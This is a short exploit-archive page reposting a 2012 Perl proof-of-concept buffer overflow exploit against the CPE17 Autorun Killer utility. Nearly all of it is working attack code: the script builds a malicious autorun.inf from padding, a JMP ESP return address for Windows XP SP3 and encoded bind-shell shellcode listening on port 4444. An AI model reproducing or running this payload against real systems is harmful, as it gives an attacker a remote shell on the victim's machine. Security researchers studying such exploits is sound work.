Home / exploits CPE17 Autorun Killer ASCII Buffer Overflow
Posted on 03 October 2012
> > # Exploit Title: CPE17 Autorun Killer - ASCII Buffer Overflow Exploit # Date: 01/10/2012 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ # Software Link: http://download.thaiware.com/program15/cpe17antiautorun1590.rar # Version: v.1.8.6 Build 1590 # Tested on: Windows XP SP3 # ------------------------------------------------------- # Bug found by Trackerx90 # ------------------------------------------------------- $file= "C:\autorun.inf"; print " [+] Creating the evil file: $file... "; $junk = "x41" x 500; $ret = pack('V',0x7e49227c); # JMP ESP - Windows XP SP3 [user32.dll] # windows/shell_bind_tcp # PORT = 4444 $shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLjHoywpgpePsPK". "9zEtqIBqtNkV2vPNkRr6lnksb4TnksBVHDOnWrjWV01io01YPnL5lPa1leRvLQ0O1HO". "fmC18GM2xpF2bwlKPR20NkCrUlVaXPlKQPd8K5iPadBjC1zpf0nk78UHNkf8a0gqkcj". "CWLbilKwDLKgqJveaIoUaYPLlYQZovms1hG4x9p1el4wsCMJXEkCM5tcEhbchlKchet". "7qICRFNkvlpKlKV8WleQKcLKtDlKwqhPNiqT4dtdSkCk1q1I1JBqYo9p2xSoBznkeBx". "klFCm3XvSebGpePcXqg1cgB1OpT58rlsGDfDG9oxU88Z05QWpePTiO4v4pPbHWYopbK". "EP9oyE2p0PpPpPG0V0W0pPaxxj6oYOM0yoYEniZgua9K1C58grc0FqqLniZF1zDPcfR". "w3XkrKktwU7io8UPSqGE8X7JIvXkOKOXUccCcv7rHD4JLwKkQkOzu67oyHGPhaePnrm". "3QIoN5e83SRMU45PnizCbwBw1GvQJVqzr22y1FZBkM56Kw0DEtUlc1C1lMRd5t4PYVC". "0aTSd2pQFv6RvW60VRnf60VCcBv0ht98LWOk6YokeLIKPpNf61VIoP0bHGxMWWmapkO". "zumk8pNUlbPVphmvNuoMmMkON5elWvsLtJk0KK9pT5s5mkPGdSRRrO0jC0bsioXUAA"; $payload = $junk.$ret.$shellcode; open($FILE,">$file") || die "[-] Error: $! "; print $FILE $payload; close($FILE); print "[+] The '$file' created successfully! "; -- mr.pr0n (@_pr0n_) http://ghostinthelab.wordpress.com
